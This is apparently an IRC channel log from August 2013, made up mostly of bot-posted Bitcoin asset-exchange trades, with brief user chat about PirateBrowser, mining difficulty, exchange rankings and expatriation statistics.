[+] Aug 10 16:45:53 wheres the japanese princess Aug 10 16:50:20 [BTCTC] [BASIC-MINING] 1 @ 0.291 BTC [-] Aug 10 16:50:34 [BTCTC] [BASIC-MINING] 1 @ 0.29 BTC [-] Aug 10 17:01:31 in another castle. Aug 10 17:05:42 [BTCTC] [BTCGARDEN] 30 @ 0.01588 = 0.4764 BTC [-] Aug 10 17:09:33 [BTCTC] [DMS.MINING] 2 @ 0.004551 = 0.0091 BTC [-] Aug 10 17:11:17 [BTCTC] [DMS.MINING] 22 @ 0.0045 = 0.099 BTC [-] Aug 10 17:17:30 [HAVELOCK] [AM100] 4 @ 0.03461 = 0.1384 BTC [-] Aug 10 17:19:09 [BTCTC] [ASICMINER-PT] 1 @ 3.825 BTC [+] Aug 10 17:20:18 [HAVELOCK] [AM100] 1 @ 0.0346 BTC [-] Aug 10 17:20:20 [HAVELOCK] [AM100] 7 @ 0.0346 = 0.2422 BTC [-] Aug 10 17:22:43 [BTCTC] [FIMB] 65 @ 0.0105 = 0.6825 BTC [+] Aug 10 17:24:42 [BTCTC] [LABCOIN] 28 @ 0.00132 = 0.037 BTC [-] Aug 10 17:25:17 [BTCTC] [TAT.ASICMINER] 5 @ 0.0376 = 0.188 BTC [-] Aug 10 17:26:12 [HAVELOCK] [XBOND] 3 @ 0.00104499 = 0.0031 BTC [+] Aug 10 17:27:04 [BTCTC] [TAT.ASICMINER] 67 @ 0.03702 = 2.4803 BTC [-] Aug 10 17:27:05 [BTCTC] [TAT.ASICMINER] 3 @ 0.03701 = 0.111 BTC [-] Aug 10 17:27:58 [HAVELOCK] [AM1] 1 @ 3.79 BTC [-] Aug 10 17:28:00 [HAVELOCK] [AM1] 1 @ 3.75 BTC [-] Aug 10 17:28:02 [HAVELOCK] [XBOND] 1 @ 0.00104499 BTC [+] Aug 10 17:28:25 [MPEX] [S.MPOE] 19275 @ 0.00083487 = 16.0921 BTC [+] Aug 10 17:28:26 [MPEX] [S.MPOE] 8700 @ 0.00083641 = 7.2768 BTC [+] Aug 10 17:28:28 [MPEX] [S.MPOE] 2400 @ 0.00083641 = 2.0074 BTC [+] Aug 10 17:28:39 [MPEX] [S.MPOE] 288 @ 0.0008366 = 0.2409 BTC [+] Aug 10 17:34:29 [BTCTC] [TAT.ASICMINER] 33 @ 0.03752 = 1.2382 BTC [+] Aug 10 17:35:33 [BTCTC] [ACTIVEMINING] 1 @ 0.005591 BTC [-] Aug 10 17:55:16 [BTCTC] [TAT.ASICMINER] 42 @ 0.03754 = 1.5767 BTC [+] Aug 10 17:55:27 [HAVELOCK] [AM100] 1 @ 0.03603 BTC [+] Aug 10 17:55:30 [HAVELOCK] [AM100] 8 @ 0.0363 = 0.2904 BTC [+] Aug 10 17:55:32 [HAVELOCK] [AM100] 33 @ 0.0363 = 1.1979 BTC [+] Aug 10 18:02:12 [BTCTC] [ACTIVEMINING] 3 @ 0.005594 = 0.0168 BTC [+] Aug 10 18:03:05 [BTCTC] [TAT.ASICMINER] 2 @ 0.03806 = 0.0761 BTC [+] Aug 10 18:03:54 [BTCTC] [ACTIVEMINING] 6 @ 0.005677 = 0.0341 BTC [+] Aug 10 18:06:19 [BTCTC] [BTC-BOND] 1 @ 0.00998 BTC [-] Aug 10 18:06:21 [BTCTC] [BTC-BOND] 2 @ 0.009901 = 0.0198 BTC [-] Aug 10 18:06:22 [BTCTC] [BTC-BOND] 697 @ 0.0099 = 6.9003 BTC [-] Aug 10 18:07:40 [BTCTC] [LABCOIN] 2 @ 0.001329 = 0.0027 BTC [+] Aug 10 18:10:37 [HAVELOCK] [AM1] 1 @ 3.9 BTC [+] Aug 10 18:11:28 [BTCTC] [LABCOIN] 18 @ 0.00132 = 0.0238 BTC [-] Aug 10 18:11:29 [BTCTC] [LABCOIN] 9 @ 0.00131 = 0.0118 BTC [-] Aug 10 18:11:31 [BTCTC] [LABCOIN] 400 @ 0.001301 = 0.5204 BTC [-] Aug 10 18:11:32 [BTCTC] [LABCOIN] 80 @ 0.0013 = 0.104 BTC [-] Aug 10 18:11:34 [BTCTC] [LABCOIN] 1 @ 0.0013 BTC [-] Aug 10 18:11:35 [BTCTC] [LABCOIN] 20 @ 0.0013 = 0.026 BTC [-] Aug 10 18:11:36 [BTCTC] [LABCOIN] 20 @ 0.001291 = 0.0258 BTC [-] Aug 10 18:11:37 [BTCTC] [LABCOIN] 165 @ 0.00129 = 0.2129 BTC [-] Aug 10 18:11:38 [BTCTC] [LABCOIN] 2 @ 0.00128 = 0.0026 BTC [-] Aug 10 18:11:39 [BTCTC] [LABCOIN] 2 @ 0.00128 = 0.0026 BTC [-] Aug 10 18:11:39 [BTCTC] [LABCOIN] 2 @ 0.00128 = 0.0026 BTC [-] Aug 10 18:11:41 [BTCTC] [LABCOIN] 9 @ 0.001256 = 0.0113 BTC [-] Aug 10 18:11:42 [BTCTC] [LABCOIN] 75 @ 0.001255 = 0.0941 BTC [-] Aug 10 18:11:43 [BTCTC] [LABCOIN] 2 @ 0.001251 = 0.0025 BTC [-] Aug 10 18:11:44 [BTCTC] [LABCOIN] 20 @ 0.00125 = 0.025 BTC [-] Aug 10 18:11:45 [BTCTC] [LABCOIN] 250 @ 0.001245 = 0.3113 BTC [-] Aug 10 18:11:46 [BTCTC] [LABCOIN] 2005 @ 0.001244 = 2.4942 BTC [-] Aug 10 18:11:47 [BTCTC] [LABCOIN] 12 @ 0.001243 = 0.0149 BTC [-] Aug 10 18:11:48 [BTCTC] [LABCOIN] 100 @ 0.001242 = 0.1242 BTC [-] Aug 10 18:11:49 [BTCTC] [LABCOIN] 143 @ 0.001231 = 0.176 BTC [-] Aug 10 18:11:50 [BTCTC] [LABCOIN] 10 @ 0.00123 = 0.0123 BTC [-] Aug 10 18:11:51 [BTCTC] [LABCOIN] 1140 @ 0.00123 = 1.4022 BTC [-] Aug 10 18:11:51 [BTCTC] [LABCOIN] 100 @ 0.001223 = 0.1223 BTC [-] Aug 10 18:11:52 [BTCTC] [LABCOIN] 219 @ 0.001223 = 0.2678 BTC [-] Aug 10 18:11:53 [BTCTC] [LABCOIN] 2000 @ 0.001222 = 2.444 BTC [-] Aug 10 18:11:54 [BTCTC] [LABCOIN] 150 @ 0.001222 = 0.1833 BTC [-] Aug 10 18:11:55 [BTCTC] [LABCOIN] 243 @ 0.001222 = 0.2969 BTC [-] Aug 10 18:11:56 [BTCTC] [LABCOIN] 1408 @ 0.001221 = 1.7192 BTC [-] Aug 10 18:12:58 [MPEX] [S.MPOE] 4702 @ 0.0008366 = 3.9337 BTC [+] Aug 10 18:13:26 [BTCTC] [DMS.MINING] 50 @ 0.00432 = 0.216 BTC [-] Aug 10 18:13:28 [BTCTC] [DMS.MINING] 20 @ 0.004449 = 0.089 BTC [+] Aug 10 18:13:29 [BTCTC] [DMS.MINING] 100 @ 0.00445 = 0.445 BTC [+] Aug 10 18:13:30 [BTCTC] [DMS.MINING] 50 @ 0.00449 = 0.2245 BTC [+] Aug 10 18:13:30 [BTCTC] [DMS.MINING] 78 @ 0.0045 = 0.351 BTC [+] Aug 10 18:13:31 [BTCTC] [DMS.MINING] 30 @ 0.004552 = 0.1366 BTC [+] Aug 10 18:13:32 [BTCTC] [DMS.MINING] 142 @ 0.004553 = 0.6465 BTC [+] Aug 10 18:13:33 [BTCTC] [DMS.MINING] 104 @ 0.004555 = 0.4737 BTC [+] Aug 10 18:13:35 [BTCTC] [DMS.MINING] 43 @ 0.004556 = 0.1959 BTC [+] Aug 10 18:13:36 [BTCTC] [DMS.MINING] 1000 @ 0.004557 = 4.557 BTC [+] Aug 10 18:13:37 [BTCTC] [DMS.MINING] 50 @ 0.004559 = 0.228 BTC [+] Aug 10 18:13:38 [BTCTC] [DMS.MINING] 100 @ 0.004568 = 0.4568 BTC [+] Aug 10 18:13:39 [BTCTC] [DMS.MINING] 315 @ 0.00459 = 1.4459 BTC [+] Aug 10 18:13:40 [BTCTC] [DMS.MINING] 11 @ 0.004723 = 0.052 BTC [+] Aug 10 18:13:41 [BTCTC] [DMS.MINING] 11 @ 0.004723 = 0.052 BTC [+] Aug 10 18:13:41 [BTCTC] [DMS.MINING] 11 @ 0.004723 = 0.052 BTC [+] Aug 10 18:13:42 [BTCTC] [DMS.MINING] 11 @ 0.004723 = 0.052 BTC [+] Aug 10 18:13:43 [BTCTC] [DMS.MINING] 64 @ 0.004747 = 0.3038 BTC [+] Aug 10 18:14:02 [HAVELOCK] [SMG] 41 @ 0.00023 = 0.0094 BTC [+] Aug 10 18:15:08 [BTCTC] [DMS.MINING] 129 @ 0.004747 = 0.6124 BTC [+] Aug 10 18:16:16 [MPEX] [S.MPOE] 460 @ 0.0008366 = 0.3848 BTC [+] Aug 10 18:16:17 [MPEX] [S.MPOE] 5200 @ 0.00083901 = 4.3629 BTC [+] Aug 10 18:20:26 [BTCTC] [DMS.PURCHASE] 60 @ 0.02817 = 1.6902 BTC [-] Aug 10 18:21:22 [HAVELOCK] [XBOND] 3 @ 0.00104499 = 0.0031 BTC [+] Aug 10 18:21:42 [BTCTC] [ACTIVEMINING] 5 @ 0.005679 = 0.0284 BTC [+] Aug 10 18:22:12 [BTCTC] [DMS.PURCHASE] 225 @ 0.02817 = 6.3383 BTC [-] Aug 10 18:23:02 [BTCTC] [DMS.MINING] 4 @ 0.004746 = 0.019 BTC [-] Aug 10 18:24:11 https://thepiratebay.sx/blog/233 Aug 10 18:24:16 The Pirate Bay - The galaxy's most resilient bittorrent site Aug 10 18:24:37 PirateBrowser - No more censorship! Aug 10 18:25:09 [BTCTC] [BTCGARDEN] 32 @ 0.01589 = 0.5085 BTC [+] Aug 10 18:25:12 [BTCTC] [BTCGARDEN] 68 @ 0.01589 = 1.0805 BTC [+] Aug 10 18:26:09 not a very good idea, especially if they don't do timely updates Aug 10 18:26:48 [BTCTC] [NASTY-PT] 1 @ 0.004148 BTC [+] Aug 10 18:26:51 I even wonder why they do this after the torbrowser issues… Aug 10 18:28:40 seems just a ff skin Aug 10 18:28:44 [BTCTC] [BASIC-MINING] 1 @ 0.305 BTC [+] Aug 10 18:28:56 http://imgur.com/JhDNwa5 Aug 10 18:28:58 MtGox is no longer the #1 exchange based on the last 24 hours - Imgur Aug 10 18:29:06 [HAVELOCK] [AM100] 1 @ 0.0349 BTC [-] Aug 10 18:29:31 [HAVELOCK] [XBOND] 2 @ 0.00104499 = 0.0021 BTC [+] Aug 10 18:30:22 http://techcrunch.com/2013/08/09/bitcoin-ticker-available-on-bloomberg-terminal/ Aug 10 18:30:25 Bitcoin Ticker Available On Bloomberg Terminal For Employees | TechCrunch Aug 10 18:32:06 not really, just add mtgoxUSD and mtgoxEUR Aug 10 18:33:33 http://www.worldometers.info/ Aug 10 18:33:37 Worldometers - real time world statistics Aug 10 18:35:12 [HAVELOCK] [AM100] 3 @ 0.0361 = 0.1083 BTC [+] Aug 10 18:35:14 [HAVELOCK] [AM100] 27 @ 0.0363 = 0.9801 BTC [+] Aug 10 18:39:26 [HAVELOCK] [XBOND] 677 @ 0.00104499 = 0.7075 BTC [+] Aug 10 18:41:44 [HAVELOCK] [AM100] 3 @ 0.0362 = 0.1086 BTC [-] Aug 10 18:42:23 [HAVELOCK] [SDSTM] 5 @ 0.00598989 = 0.0299 BTC [+] Aug 10 18:42:32 [HAVELOCK] [XBOND] 5 @ 0.001045 = 0.0052 BTC [+] Aug 10 18:43:05 [HAVELOCK] [SMG] 1 @ 0.00023 BTC [+] Aug 10 18:46:53 [BTCTC] [DMS.PURCHASE] 11 @ 0.02817 = 0.3099 BTC [-] Aug 10 18:55:19 also http://www.aggressivechristianity.net/articles/maryjane.htm Aug 10 18:56:35 [BTCTC] [BTCGARDEN] 2 @ 0.01589 = 0.0318 BTC [+] Aug 10 18:59:40 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.001882 = 0.0094 BTC [-] Aug 10 19:00:21 [BTCTC] [DMS.MINING] 1 @ 0.004746 BTC [-] Aug 10 19:00:42 Expatriates giving up their nationality at U.S. embassies climbed to 1,131 in the three months through June from 189 in the year-earlier period, according to Federal Register figures published today. That brought the first-half total to 1,810 compared with 235 for the whole of 2008. Aug 10 19:01:12 and for the record, if you're not doing it you will likely end up the same way nazi germans ended up : Aug 10 19:01:20 [BTCTC] [LABCOIN] 8 @ 0.001271 = 0.0102 BTC [+] Aug 10 19:01:23 either shot by your own government or else hanged at the end of the war by the victorious side. Aug 10 19:03:51 [BTCTC] [TAT.ASICMINER] 16 @ 0.03706 = 0.593 BTC [-] Aug 10 19:04:04 mircea_popescu: bad example, most of the boring, everyday Germans survived the war. Aug 10 19:04:30 mircea_popescu: and, for that matter, so did most of the Nazi middle management. Aug 10 19:06:20 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.001881 = 0.1881 BTC [-] Aug 10 19:06:23 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.001899 = 0.1899 BTC [+] Aug 10 19:07:14 [HAVELOCK] [AM100] 2 @ 0.0362 = 0.0724 BTC [-] Aug 10 19:15:23 [BTCTC] [DMS.MINING] 60 @ 0.00422 = 0.2532 BTC [-] Aug 10 19:15:24 [BTCTC] [DMS.MINING] 140 @ 0.004212 = 0.5897 BTC [-] Aug 10 19:15:45 asciilifeform not unless you go by the ever popular "most of those that survived survived" Aug 10 19:30:31 [BTCTC] [COGNITIVE] 7 @ 0.3496 = 2.4472 BTC [-] Aug 10 19:30:32 [BTCTC] [COGNITIVE] 1 @ 0.3497 BTC [+] Aug 10 19:30:33 [BTCTC] [COGNITIVE] 4 @ 0.35 = 1.4 BTC [+] Aug 10 19:31:36 [BTCTC] [LABCOIN] 2 @ 0.00127 = 0.0025 BTC [-] Aug 10 19:31:37 [BTCTC] [LABCOIN] 20 @ 0.001271 = 0.0254 BTC [+] Aug 10 19:34:08 [MPEX] [S.MPOE] 4760 @ 0.00083964 = 3.9967 BTC [+] Aug 10 19:34:10 [MPEX] [S.MPOE] 15644 @ 0.0008399 = 13.1394 BTC [+] Aug 10 19:34:11 [MPEX] [S.MPOE] 3896 @ 0.00083997 = 3.2725 BTC [+] Aug 10 19:34:41 [BTCTC] [DMS.MINING] 100 @ 0.0043 = 0.43 BTC [+] Aug 10 19:34:55 [BTCTC] [DMS.MINING] 100 @ 0.00435 = 0.435 BTC [+] Aug 10 19:34:57 [BTCTC] [DMS.MINING] 100 @ 0.00435 = 0.435 BTC [+] Aug 10 19:35:30 [BTCTC] [BASIC-MINING] 9 @ 0.311 = 2.799 BTC [+] Aug 10 19:35:32 [BTCTC] [BASIC-MINING] 3 @ 0.3111 = 0.9333 BTC [+] Aug 10 19:35:46 [BTCTC] [DMS.MINING] 88 @ 0.0044 = 0.3872 BTC [+] Aug 10 19:36:20 [BTCTC] [BASIC-MINING] 1 @ 0.3122 BTC [+] Aug 10 19:36:52 [BTCTC] [TAT.ASICMINER] 36 @ 0.03791 = 1.3648 BTC [+] Aug 10 19:37:04 [BTCTC] [BASIC-MINING] 1 @ 0.3153 BTC [+] Aug 10 19:37:05 [BTCTC] [BASIC-MINING] 5 @ 0.3154 = 1.577 BTC [+] Aug 10 19:37:27 [BTCTC] [LABCOIN] 30 @ 0.00129 = 0.0387 BTC [+] Aug 10 19:37:28 [BTCTC] [LABCOIN] 8 @ 0.001291 = 0.0103 BTC [+] Aug 10 19:37:53 [BTCTC] [ACTIVEMINING] 5 @ 0.005681 = 0.0284 BTC [+] Aug 10 19:38:07 [BTCTC] [LABCOIN] 15 @ 0.001292 = 0.0194 BTC [+] Aug 10 19:38:07 [BTCTC] [LABCOIN] 8 @ 0.001293 = 0.0103 BTC [+] Aug 10 19:40:08 [HAVELOCK] [AM100] 10 @ 0.036 = 0.36 BTC [-] Aug 10 19:41:42 [BTCTC] [LABCOIN] 2 @ 0.00131 = 0.0026 BTC [+] Aug 10 19:44:29 [BTCTC] [DMS.MINING] 6 @ 0.0044 = 0.0264 BTC [+] Aug 10 19:49:12 [BTCTC] [DMS.SELLING] 14 @ 0.02356 = 0.3298 BTC [+] Aug 10 19:49:14 [BTCTC] [DMS.SELLING] 20 @ 0.02356 = 0.4712 BTC [+] Aug 10 19:49:15 [BTCTC] [DMS.SELLING] 10 @ 0.02355 = 0.2355 BTC [-] Aug 10 19:49:16 [BTCTC] [DMS.SELLING] 56 @ 0.02351 = 1.3166 BTC [-] Aug 10 19:51:00 [BTCTC] [LABCOIN] 1 @ 0.001311 BTC [+] Aug 10 19:52:20 [BTCTC] [LABCOIN] 20 @ 0.001298 = 0.026 BTC [-] Aug 10 19:56:00 [HAVELOCK] [SDSTM] 1 @ 0.00598989 BTC [+] Aug 10 20:02:48 [HAVELOCK] [XBOND] 3 @ 0.001045 = 0.0031 BTC [+] Aug 10 20:03:25 [HAVELOCK] [XBOND] 5 @ 0.001045 = 0.0052 BTC [+] Aug 10 20:09:09 [BTCTC] [ACTIVEMINING] 30 @ 0.005681 = 0.1704 BTC [+] Aug 10 20:09:09 [BTCTC] [ACTIVEMINING] 20 @ 0.005682 = 0.1136 BTC [+] Aug 10 20:09:11 [BTCTC] [ACTIVEMINING] 10 @ 0.005683 = 0.0568 BTC [+] Aug 10 20:09:12 [BTCTC] [ACTIVEMINING] 170 @ 0.005683 = 0.9661 BTC [+] Aug 10 20:09:13 [BTCTC] [ACTIVEMINING] 320 @ 0.005684 = 1.8189 BTC [+] Aug 10 20:09:14 [BTCTC] [ACTIVEMINING] 200 @ 0.005684 = 1.1368 BTC [+] Aug 10 20:09:53 [BTCTC] [DMS.MINING] 6 @ 0.0044 = 0.0264 BTC [+] Aug 10 20:10:20 [BTCTC] [ACTIVEMINING] 30 @ 0.005689 = 0.1707 BTC [+] Aug 10 20:10:33 [BTCTC] [DMS.MINING] 5 @ 0.00445 = 0.0223 BTC [+] Aug 10 20:10:52 [BTCTC] [ACTIVEMINING] 117 @ 0.00569 = 0.6657 BTC [+] Aug 10 20:11:07 [BTCTC] [TAT.ASICMINER] 50 @ 0.0373 = 1.865 BTC [-] Aug 10 20:11:16 [BTCTC] [ACTIVEMINING] 2 @ 0.005689 = 0.0114 BTC [-] Aug 10 20:12:32 [HAVELOCK] [XBOND] 1 @ 0.001045 BTC [+] Aug 10 20:16:38 [BTCTC] [LABCOIN] 20 @ 0.001297 = 0.0259 BTC [-] Aug 10 20:16:40 [BTCTC] [LABCOIN] 12 @ 0.001293 = 0.0155 BTC [-] Aug 10 20:16:41 [BTCTC] [LABCOIN] 6 @ 0.001261 = 0.0076 BTC [-] Aug 10 20:16:42 [BTCTC] [LABCOIN] 48 @ 0.00126 = 0.0605 BTC [-] Aug 10 20:16:44 [BTCTC] [LABCOIN] 1 @ 0.00125 BTC [-] Aug 10 20:16:45 [BTCTC] [LABCOIN] 5 @ 0.001248 = 0.0062 BTC [-] Aug 10 20:16:46 [BTCTC] [LABCOIN] 50 @ 0.001247 = 0.0624 BTC [-] Aug 10 20:16:47 [BTCTC] [LABCOIN] 15 @ 0.001232 = 0.0185 BTC [-] Aug 10 20:16:48 [BTCTC] [LABCOIN] 100 @ 0.001232 = 0.1232 BTC [-] Aug 10 20:16:49 [BTCTC] [LABCOIN] 146 @ 0.001232 = 0.1799 BTC [-] Aug 10 20:20:52 [BTCTC] [NASTY-PT] 76 @ 0.003605 = 0.274 BTC [-] Aug 10 20:22:41 [HAVELOCK] [XBOND] 18 @ 0.001045 = 0.0188 BTC [+] Aug 10 20:22:51 [BTCTC] [LTC-ATF.B2] 26 @ 0.01043 = 0.2712 BTC [-] Aug 10 20:24:08 [BTCTC] [BMF] 1 @ 0.03116 BTC [-] Aug 10 20:27:01 !ticker btctc dms.selling Aug 10 20:27:02 [BTCT:DMS.SELLING] 1D: 0.0235 / 0.02404 / 0.02445 (1471 shares, 35.4 BTC), 7D: 0.0201 / 0.02255 / 0.0264 (16959 shares, 382.4 BTC), 30D: 0.0176 / 0.02337 / 0.035688 (59404 shares, 1388 BTC) Aug 10 20:27:04 ;;bc,stats Aug 10 20:27:06 Current Blocks: 251360 | Current Difficulty: 3.7392766136474565E7 | Next Difficulty At Block: 251999 | Next Difficulty In: 639 blocks | Next Difficulty In About: 3 days, 5 hours, 3 minutes, and 55 seconds | Next Difficulty Estimate: None | Estimated Percent Change: None Aug 10 20:27:13 ;;estimate Aug 10 20:27:13 Next difficulty estimate | None based on data since last change | 53898252.1262 based on data for last three days Aug 10 20:27:54 [BTCTC] [BTC-BOND] 3 @ 0.009999 = 0.03 BTC [+] Aug 10 20:29:10 [BTCTC] [FIMB] 100 @ 0.0105 = 1.05 BTC [+] Aug 10 20:31:20 [HAVELOCK] [XBOND] 14 @ 0.001045 = 0.0146 BTC [+] Aug 10 20:32:19 [BTCTC] [LABCOIN] 3 @ 0.001298 = 0.0039 BTC [+] Aug 10 20:32:20 [BTCTC] [LABCOIN] 5 @ 0.001299 = 0.0065 BTC [+] Aug 10 20:33:30 [BTCTC] [TAT.ASICMINER] 10 @ 0.03782 = 0.3782 BTC [+] Aug 10 20:33:45 [BTCTC] [BASIC-MINING] 3 @ 0.3151 = 0.9453 BTC [-] Aug 10 20:33:46 [BTCTC] [BASIC-MINING] 1 @ 0.3153 BTC [+] Aug 10 20:33:47 [BTCTC] [BASIC-MINING] 12 @ 0.3154 = 3.7848 BTC [+] Aug 10 20:35:02 [MPEX] [S.MPOE] 990 @ 0.00083903 = 0.8306 BTC [-] Aug 10 20:37:23 [BTCTC] [COGNITIVE] 2 @ 0.3989 = 0.7978 BTC [+] Aug 10 20:37:24 [BTCTC] [COGNITIVE] 1 @ 0.3992 BTC [+] Aug 10 20:37:25 [BTCTC] [COGNITIVE] 2 @ 0.3993 = 0.7986 BTC [+] Aug 10 20:37:26 [BTCTC] [COGNITIVE] 4 @ 0.3994 = 1.5976 BTC [+] Aug 10 20:37:27 [BTCTC] [COGNITIVE] 3 @ 0.3995 = 1.1985 BTC [+] Aug 10 20:37:28 [BTCTC] [COGNITIVE] 1 @ 0.3999 BTC [+] Aug 10 20:42:37 [BTCTC] [BITVPS] 87 @ 0.001951 = 0.1697 BTC [-] Aug 10 20:42:38 [BTCTC] [BITVPS] 113 @ 0.00195 = 0.2204 BTC [-] Aug 10 20:47:55 [BTCTC] [DMS.SELLING] 50 @ 0.02439 = 1.2195 BTC [+] Aug 10 20:47:56 [BTCTC] [DMS.SELLING] 4 @ 0.0244 = 0.0976 BTC [+] Aug 10 20:47:58 [BTCTC] [DMS.SELLING] 46 @ 0.02445 = 1.1247 BTC [+] Aug 10 20:47:59 [BTCTC] [DMS.SELLING] 50 @ 0.02448 = 1.224 BTC [+] Aug 10 20:49:58 [BTCTC] [DMS.PURCHASE] 50 @ 0.02811 = 1.4055 BTC [-] Aug 10 20:53:18 [BTCTC] [LABCOIN] 22 @ 0.00128 = 0.0282 BTC [-] Aug 10 20:53:19 [BTCTC] [LABCOIN] 2 @ 0.001281 = 0.0026 BTC [+] Aug 10 20:55:09 [BTCTC] [BITVPS] 174 @ 0.001951 = 0.3395 BTC [+] Aug 10 20:55:11 [BTCTC] [BITVPS] 27 @ 0.00195 = 0.0527 BTC [-] Aug 10 20:57:15 [BTCTC] [DMS.MINING] 36 @ 0.00432 = 0.1555 BTC [-] Aug 10 20:57:43 [BTCTC] [LABCOIN] 2 @ 0.001314 = 0.0026 BTC [+] Aug 10 21:01:12 !ticker btctc dms.mining Aug 10 21:01:20 [BTCT:DMS.MINING] 1D: 0.004121 / 0.0045 / 0.004747 (5088 shares, 22.9 BTC), 7D: 0.003997 / 0.00629 / 0.0105 (33295 shares, 209.5 BTC), 30D: 0.003997 / 0.01052 / 0.017799 (112459 shares, 1183.2 BTC) Aug 10 21:02:51 [BTCTC] [BMF] 4 @ 0.03692 = 0.1477 BTC [+] Aug 10 21:09:12 [BTCTC] [TAT.ASICMINER] 31 @ 0.03819 = 1.1839 BTC [+] Aug 10 21:10:34 [HAVELOCK] [HIM] 1 @ 0.136 BTC [+] Aug 10 21:13:54 [BTCTC] [DMS.MINING] 1 @ 0.00432 BTC [-] Aug 10 21:23:16 [BTCTC] [ASICMINER-PT] 1 @ 3.781 BTC [-] Aug 10 21:23:39 [BTCTC] [TAT.ASICMINER] 34 @ 0.03741 = 1.2719 BTC [-] Aug 10 21:24:16 [BTCTC] [TAT.MINIGAME] 7 @ 0.000223 = 0.0016 BTC [-] Aug 10 21:25:23 [BTCTC] [BTCGARDEN] 1 @ 0.0159 BTC [+] Aug 10 21:26:05 [BTCTC] [LABCOIN] 100 @ 0.001286 = 0.1286 BTC [-] Aug 10 21:27:43 [BTCTC] [DMS.PURCHASE] 25 @ 0.02811 = 0.7028 BTC [-] Aug 10 21:28:54 [HAVELOCK] [XBOND] 299 @ 0.00104499 = 0.3125 BTC [-] Aug 10 21:32:46 [MPEX] [S.MPOE] 8750 @ 0.00083282 = 7.2872 BTC [-] Aug 10 21:33:02 [BTCTC] [ACTIVEMINING] 29 @ 0.00561 = 0.1627 BTC [-] Aug 10 21:34:03 [BTCTC] [ACTIVEMINING] 30 @ 0.00561 = 0.1683 BTC [-] Aug 10 21:34:05 [BTCTC] [ACTIVEMINING] 1 @ 0.005609 BTC [-] Aug 10 21:34:06 [BTCTC] [ACTIVEMINING] 1 @ 0.005601 BTC [-] Aug 10 21:34:07 [BTCTC] [ACTIVEMINING] 2 @ 0.00559 = 0.0112 BTC [-] Aug 10 21:34:08 [BTCTC] [ACTIVEMINING] 19 @ 0.005503 = 0.1046 BTC [-] Aug 10 21:34:10 [BTCTC] [ACTIVEMINING] 67 @ 0.005502 = 0.3686 BTC [-] Aug 10 21:35:03 [BTCTC] [ACTIVEMINING] 30 @ 0.005505 = 0.1652 BTC [+] Aug 10 21:35:25 [BTCTC] [ACTIVEMINING] 30 @ 0.005504 = 0.1651 BTC [-] Aug 10 21:36:15 [BTCTC] [ACTIVEMINING] 25 @ 0.005505 = 0.1376 BTC [+] Aug 10 21:36:16 [BTCTC] [ACTIVEMINING] 68 @ 0.005504 = 0.3743 BTC [-] Aug 10 21:36:18 [BTCTC] [ACTIVEMINING] 27 @ 0.005503 = 0.1486 BTC [-] Aug 10 21:36:47 [BTCTC] [ACTIVEMINING] 30 @ 0.005503 = 0.1651 BTC [-] Aug 10 21:36:48 [BTCTC] [ACTIVEMINING] 20 @ 0.005502 = 0.11 BTC [-] Aug 10 21:36:50 [BTCTC] [ACTIVEMINING] 2 @ 0.0055 = 0.011 BTC [-] Aug 10 21:45:48 ;;later tell jborkl hey, if you're still doing that news blog thing : see if you can get an interview with the mazzant character and ask him a. if it's true that he cut his vacation short so he could participater in the sec lawsuit and b. how come the pro hac vice was accepted the same day when their website says it takes a week or two. Aug 10 21:45:48 The operation succeeded. Aug 10 21:49:35 [BTCTC] [DMS.SELLING] 40 @ 0.02445 = 0.978 BTC [-] Aug 10 21:51:41 [BTCTC] [DMS.PURCHASE] 40 @ 0.02811 = 1.1244 BTC [-] Aug 10 21:53:13 [HAVELOCK] [XBOND] 800 @ 0.001045 = 0.836 BTC [+] Aug 10 21:55:14 [BTCTC] [DMS.MINING] 100 @ 0.004212 = 0.4212 BTC [-] Aug 10 21:55:55 [BTCTC] [FIMB] 20 @ 0.0105 = 0.21 BTC [+] Aug 10 21:58:24 [BTCTC] [DMS.PURCHASE] 10 @ 0.02811 = 0.2811 BTC [-] Aug 10 22:11:45 [BTCTC] [DMS.MINING] 40 @ 0.0043 = 0.172 BTC [+] Aug 10 22:18:05 [BTCTC] [NASTY-PT] 10 @ 0.004139 = 0.0414 BTC [+] Aug 10 22:18:34 [BTCTC] [NASTY-PT] 10 @ 0.00414 = 0.0414 BTC [+] Aug 10 22:24:51 [BTCTC] [DMS.MINING] 25 @ 0.004398 = 0.11 BTC [+] Aug 10 22:27:24 [BTCTC] [DMS.MINING] 100 @ 0.004399 = 0.4399 BTC [+] Aug 10 22:27:25 [BTCTC] [DMS.MINING] 50 @ 0.0044 = 0.22 BTC [+] Aug 10 22:27:30 [HAVELOCK] [AM100] 24 @ 0.0363 = 0.8712 BTC [+] Aug 10 22:30:29 [MPEX] [S.MPOE] 5223 @ 0.00083421 = 4.3571 BTC [+] Aug 10 22:31:00 [BTCTC] [TAT.ASICMINER] 6 @ 0.03821 = 0.2293 BTC [+] Aug 10 22:33:26 <[\\\]> .d Aug 10 22:33:26 37392766.13647 | Next Diff in 627 blocks | Estimated Change: 31.3010% in 2d 23h 22m 29s Aug 10 22:35:41 31% wow Aug 10 22:35:58 mhm Aug 10 22:36:20 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.00188 = 0.0038 BTC [-] Aug 10 22:38:29 [BTCTC] [TAT.ASICMINER] 11 @ 0.03814 = 0.4195 BTC [-] Aug 10 22:38:31 [BTCTC] [TAT.ASICMINER] 30 @ 0.0374 = 1.122 BTC [-] Aug 10 22:38:43 [HAVELOCK] [AM100] 26 @ 0.0363 = 0.9438 BTC [+] Aug 10 22:38:44 [HAVELOCK] [AM100] 15 @ 0.036499 = 0.5475 BTC [+] Aug 10 22:40:09 [BTCTC] [BMF] 5 @ 0.03101 = 0.1551 BTC [-] Aug 10 22:40:41 [BTCTC] [LABCOIN] 1 @ 0.001292 BTC [+] Aug 10 22:40:54 [BTCTC] [LABCOIN] 20 @ 0.001293 = 0.0259 BTC [+] Aug 10 22:41:21 jurov: how bout DEM FUTURES!!!! Aug 10 22:42:03 :D Aug 10 22:42:09 [MPEX] [S.MPOE] 6677 @ 0.00083421 = 5.57 BTC [+] Aug 10 22:42:12 [MPEX] [S.MPOE] 3936 @ 0.00083504 = 3.2867 BTC [+] Aug 10 22:42:45 [BTCTC] [LABCOIN] 15 @ 0.001305 = 0.0196 BTC [+] Aug 10 22:42:55 no need to scream. i set the limits and prepared to take the loss Aug 10 22:43:19 [HAVELOCK] [XBOND] 40 @ 0.00104699 = 